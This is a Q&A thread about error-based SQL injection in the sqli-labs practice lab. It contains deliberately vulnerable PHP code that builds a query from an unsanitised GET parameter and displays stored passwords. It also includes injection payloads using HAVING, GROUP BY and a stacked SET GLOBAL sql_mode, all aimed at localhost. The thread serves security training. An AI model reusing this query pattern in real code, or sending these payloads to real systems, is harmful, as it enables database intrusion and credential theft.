# Why Group by & HAVING clauses doesnt work?

Tags: php, sql-injection

I was testing my application for **SQL-injection** attacks , here is the source code:

```
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    }
    else 
    {
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());
    echo "</font>";  
    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>
```

and the url like this :

```
http://localhost:8080/sqli-labs-master/Less-1/?id=1
```

when i put (') , its give me an error like this :

```
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
```

so when i want to extract columns name via **HAVING AND GROUP BY** its doesn't work . i try this :

```
http://localhost:8080/sqli-labs-master/Less-1/?id=1' HAVING 1=1 -- -
```

and nothing happens . so why i cant get any column names via **HAVING** and its an **error based injection** ...

Comment: Move to more up-to-date extensions `PDO` or `mysqli`, as `mysql` is __removed__.

Comment: @u_mulder , i have an old php version , so its ok , but why i cant do 1' having 1=1 -- -  ?? is that just for sql-server ? or what ??

Answer (score 1):

If I understand you correctly, you are trying to extract the column name by provoking an error through not specifying all column names in a having or group by clause.

For SQL Server this should work.

MySQL has an option called [ONLY_FULL_GROUP_BY](https://dev.mysql.com/doc/refman/8.0/en/sql-mode.html#sqlmode_only_full_group_by), and if it is not enabled you won't get an error. Version 5.7.5 enables `ONLY_FULL_GROUP_BY` mode per default, so I assume you are using an old MySQL version.

For your attack you probably want to enable `ONLY_FULL_GROUP_BY` first and then provoke [error 1055](https://dev.mysql.com/doc/refman/5.5/en/error-messages-server.html#error_er_wrong_field_with_group) - however, that only works if the user has the required permissions to do that.

Given that you have the required permissions, something like this may work (untested):

```
http://localhost:8080/sqli-labs-master/Less-1/?id=1%27%3B%20SET%20GLOBAL%20sql_mode%20%3D%20%27ONLY_FULL_GROUP_BY%27%20--%20-
http://localhost:8080/sqli-labs-master/Less-1/?id=1%27%20GROUP%20BY%201%20--%20-
```